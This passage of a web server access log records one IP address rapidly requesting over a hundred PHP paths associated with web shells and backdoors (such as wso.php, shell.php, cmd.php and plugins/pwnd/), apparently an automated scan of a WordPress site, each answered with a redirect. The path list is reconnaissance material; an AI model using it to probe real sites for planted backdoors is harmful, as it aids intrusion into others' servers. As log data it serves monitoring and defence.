HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:15:49 +0700] "GET /plugins/all-in-one-wp-migration/lib/controller/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:15:49 +0700] "GET /admin-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:50 +0700] "GET /web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:50 +0700] "GET /terms.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:50 +0700] "GET /css/colors/coffee/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:50 +0700] "GET /pki-validation/license.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:50 +0700] "GET /zaza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:51 +0700] "GET /images/smilies/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:51 +0700] "GET /system/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:51 +0700] "GET /class-wp-pages.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:51 +0700] "GET /themes/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:15:51 +0700] "GET /customize/123.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:52 +0700] "GET /uploads/k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:52 +0700] "GET /widgets/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:52 +0700] "GET /alpha.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:52 +0700] "GET /themes/wp-pridmag/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:52 +0700] "GET /assets/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:53 +0700] "GET /wp-admin/maint/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:53 +0700] "GET /IXR/imge.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:15:53 +0700] "GET /plugins/WordPressCore/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:53 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:53 +0700] "GET /pomo/user-new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:54 +0700] "GET /css/colors/blue/uploader.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:15:54 +0700] "GET /home.php?xsec=team HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:54 +0700] "GET /css/colors/blue/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:54 +0700] "GET /class-wp-session-href.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:54 +0700] "GET /wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:55 +0700] "GET /css/colors/midnight/vitoria.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:55 +0700] "GET /themes/alera/gecko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:15:55 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:55 +0700] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:15:55 +0700] "GET /images/cmd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:56 +0700] "GET /selectrss/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:56 +0700] "GET /ID3getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:56 +0700] "GET /uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:56 +0700] "GET /Files/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:57 +0700] "GET /pki-validation/xmlelement-settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:57 +0700] "GET /pki-validation/db-update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:57 +0700] "GET /css/dist/wp-the1me.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:57 +0700] "GET /plugins/akismet/views/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:57 +0700] "GET /acme-challenge/inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:58 +0700] "GET /Text/options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:58 +0700] "GET /plugins/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:58 +0700] "GET /plugins/elementor/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:58 +0700] "GET /css/colors/modern/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:58 +0700] "GET /uploads/bak.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:59 +0700] "GET /991176.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:59 +0700] "GET /plugins/pwnd/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:59 +0700] "GET /uploads/cache.cleaner.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:59 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:59 +0700] "GET /uploads/2020/09/eknlmor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:00 +0700] "GET /rest-api/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:16:00 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:00 +0700] "GET /css/colors/blue/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:00 +0700] "GET /images/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:00 +0700] "GET /theme-compat/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:16:01 +0700] "GET /plugins/wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:16:01 +0700] "GET /pki-validation/zabi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:01 +0700] "GET /user/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:01 +0700] "GET /themes/twenty/twenty.php/xx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:01 +0700] "GET /ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:02 +0700] "GET /acme-challenge/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:02 +0700] "GET /uploads/wpr-addons/forms/ss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:02 +0700] "GET /g4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:02 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:02 +0700] "GET /css/wrapper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:03 +0700] "GET /plugins/hellopress/wp_mna.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:03 +0700] "GET /js/l0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:03 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:03 +0700] "GET /ID3/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:03 +0700] "GET /hello.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:04 +0700] "GET /plugins/fix/www.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:04 +0700] "GET /Text/mCBlbb.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:04 +0700] "GET /js/widgets/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:04 +0700] "GET /lnbgpdvr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:05 +0700] "GET /js/widgets/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:05 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:05 +0700] "GET /rss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:05 +0700] "GET /uploads/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:06 +0700] "GET /js/codemirror/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:06 +0700] "GET /maint/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:06 +0700] "GET /iedevrth.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:06 +0700] "GET /plugins/seoplugins/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:06 +0700] "GET /uploads/2020/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:07 +0700] "GET /uploads/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:07 +0700] "GET /ms-default-constants-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:07 +0700] "GET /footersysm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:07 +0700] "GET /plugins/abtest/abtest_admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:07 +0700] "GET /block-supports/duotones.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:08 +0700] "GET /plugins/seoplugins/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:08 +0700] "GET /includes/index1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:08 +0700] "GET /wp-content/plugins/hermes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:08 +0700] "GET /includes/css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:08 +0700] "GET /SimplePie/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:09 +0700] "GET /rest-api/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:09 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:09 +0700] "GET /pekok.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:09 +0700] "GET /images/thumbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:16:09 +0700] "GET /plugins/pwnd/fai.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:10 +0700] "GET /fonts/rk2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:10 +0700] "GET /network/checkbex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:10 +0700] "GET /plugins/pwnd/1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:10 +0700] "GET /cheeshot.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:11 +0700] "GET /moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:11 +0700] "GET /news/gale.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:11 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:11 +0700] "GET /wp-style-functions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:11 +0700] "GET /images/upfile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:12 +0700] "GET /images/3374efa125.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:16:12 +0700] "GET /plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:12 +0700] "GET /themes/evita/issue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:12 +0700] "GET /plugins/ph-file-manager/wp-file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:12 +0700] "GET /pki-validation/validation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:13 +0700] "GET /uploads/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:13 +0700] "GET /classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 